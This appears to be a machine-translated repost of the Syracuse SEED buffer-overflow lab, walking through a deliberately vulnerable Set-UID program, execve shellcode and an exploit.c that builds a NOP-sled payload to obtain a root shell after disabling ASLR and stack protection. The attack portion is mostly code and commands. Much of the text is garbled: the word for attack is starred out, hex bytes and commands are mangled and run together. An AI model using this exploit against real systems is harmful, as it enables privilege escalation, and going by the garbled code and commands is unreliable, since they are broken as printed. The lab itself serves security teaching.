In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-28 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Buffer overflow vulnerability experiment this experiment is detailed from http://www.shiyanlou.com/courses/231, reprint please indicate the source. I. description of the experiment
A buffer overflow is a situation in which a program attempts to write more than pre-allocated fixed-length data to a buffer. This vulnerability can be exploited by malicious users to change the flow control of the program, or even execute arbitrary fragments of code. This vulnerability is due to the temporary shutdown of the data buffer and the return address, which can cause the return address to be rewritten.
Second, experimental preparation
In this experiment, in order to facilitate the observation of assembly statements, we need to operate in a 32-bit environment, so we need to make some preparations before the experiment.
1. Enter the command to install something used to compile the 32-bit C program: sudo apt-get updatesudo apt-get install lib32z1 libc6-dev-i386sudo apt-get install lib32readline-gplv2-dev2, enter the command "linux32" into the 32-bit linux environment. At this point, you will find that the command line is not so good to use, for example, it cannot be completed by tab, so type "/ bin/bash" to use bash:
III. Experiment step 3.1 initial setup
In Ubuntu and other Linux systems, address space randomization is used to random the initial addresses of heap and stack, which makes it difficult to guess the exact memory address, which is the key to buffer overflow. So in this lab, we use the following command to turn off this feature:
Sudo sysctl-w kernel.randomize_va_space=0
In addition, to further prevent buffer overflows and other uses of shell programs, many shell programs automatically relinquish their privileges when called. Therefore, even if you can trick a Set-UID program into calling a shell, you cannot maintain root permissions in the shell. This protection is implemented in / bin/bash.
In linux systems, / bin/sh is actually a symbolic link to / bin/bash or / bin/dash. To recreate the situation before this protection was implemented, we use another shell program (zsh) instead of / bin/bash. The following instructions describe how to set up the zsh program:
Sudo sucd / binrm shln-s zsh shexit3.2 shellcode
In general, a buffer overflow causes a program to crash, in which the overflowed data overwrites the return address. If the data that overrides the return address is another address, then the program jumps to that address, and if that address holds a piece of well-designed code for other functions, this code is shellcode.
Observe the following code:
# include int main () {char * name [2]; name [0] ='/ bin/sh'';name [1] = NULL;execve (name [0], name, NULL);}
The shellcode of this experiment is the assembler version of the code just now:
\ x31\ xc0\ x50\ x68 "/ sh"\ x68 "/ bin"\ x89\ xe3\ x50\ x53\ x89\ xe1\ x99\ xb0\ x0b\ xcd\ x803.3 vulnerability program
Save the following code as a "stack.c" file in the / tmp directory. The code is as follows:
/ * stack.c * / / * This program has a buffer overflow vulnerability. * / * Our task is to exploit this vulnerability * / # include # include # include int bof (char * str) {char buffer [12]; / * The following statement has a buffer overflow problem * / strcpy (buffer, str); return 1;} int main (int argc, char * * argv) {char str [517]; FILE * badfile;badfile = fopen ("badfile", "r"); fread (str, sizeof (char), 517, badfile); bof (str); printf ("Returned Properly\ n"); return 1;};
As you can see from the code, the program reads a file called "badfile" and loads the contents of the file into "buffer".
Compile the program and set SET-UID. The command is as follows:
Sudo sugcc-M32-g-z execstack-fno-stack-protector-o stack stack.cchmod Utility stackexit
The GCC compiler has a stack protection mechanism to prevent buffer overflows, so we need to turn this mechanism off with-fno-stack-protector when compiling the code.
The-z execstack is used to allow stack execution.
3.4 * program
Our purpose is to * the vulnerability program just mentioned, and to obtain root privileges through *.
Save the following code as a "exploit.c" file in the / tmp directory. The code is as follows:
/ * exploit.c * / * A program that creates a file containing code for launching shell*/#include # include # include char shellcode [] = "\ x31\ xc0" / / xorl% eax,%eax "\ x50" / / pushl% eax "\ x68" / / sh "/ / pushl $0x68732f2f"\ x68 "/ / bin" / / pushl $0x6e69622f "\ x89\ xe3" / / movl% esp % ebx "\ x50" / / pushl% eax "\ x53" / / pushl% ebx "\ x89\ xe1" / / movl% esp,%ecx "\ x99" / / cdq "\ xb0\ x0b" / / movb $0x0b xcd% al "\ xcd\ x80" / / int $0x80 Void main (int argc, char * * argv) {char buffer [517]; FILE * badfile;/* Initialize buffer with 0x90 (NOP instruction) * / memset (& buffer, 0x90, 517); / * You need to fill the buffer with appropriate contents here * / strcpy (buffer, "\ x90\ X90\ X90? Strcpy (buffer+100,shellcode); / * Save the contents to the file "badfile" * / badfile = fopen (". / badfile", "w"); fwrite (buffer, 517,1, badfile); fclose (badfile);}
Notice the code above, "\ xboy?\ xcow?\ xcake?\ xcake?" You need to add the address where shellcode is stored in memory, because this location is just enough to overwrite the return address after an overflow occurs.
And strcpy (buffer+100,shellcode); this sentence in turn tells us that shellcode is stored in the location of buffer+100.
Now we need to get the address of shellcode in memory and type the command:
Gdb stackdisass main
The result is shown in the figure:
The next step is:
According to the statement strcpy (buffer+100,shellcode), we calculate the address of shellcode as 0xffffd1b0 (hexadecimal) + 100 (decimal) = 0xffffd214 (hexadecimal)
Now modify the exploit.c file! Will\ xboy?\ xboy?\ xboy? Modify to\ x14\ xd2\ xff\ xff
Then, compile the exploit.c program:
Gcc-M32-o exploit exploit.c3.5 * * result
First run the * * program exploit, and then run the vulnerability program stack to observe the results:
It can be seen that through * *, you have obtained the root permission!
If you cannot * succeed and prompt "segment error", then re-use gdb disassembly to calculate the memory address.
Fourth, exercise 1, follow the experimental steps, * loophole programs and obtain root permissions. 2. Open the address space randomization mechanism of the system by using the command "sudo sysctl-w kernel.randomize_va_space=2", and reuse the exploit program * * stack program to see if it is successful and whether you can get root permission. 3. Redirect / bin/sh to / bin/bash (or / bin/dash) to see if * is successful and whether you can obtain root permission.
Please complete the above exercises in the environment of the experimental building and take screenshots.
License
The experiment involved in this course is from Syracuse SEED labs, and on this basis, it is modified to adapt to the website environment of the experimental building, and the modified experimental documents still follow GNU Free Documentation License.
This course document github link: https://github.com/shiyanlou/seedlab
Syracuse SEED labs copyright notice attached:
Copyright Statement Copyright 2006-2014 Wenliang Du, Syracuse University. The development of this document is funded by the National Science Foundation's Course, Curriculum, and Laboratory Improvement (CCLI) program under Award No. 0618680 and 0231122. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. A copy of the license can befound at http://www.gnu.org/licenses/fdl.html.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 239
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.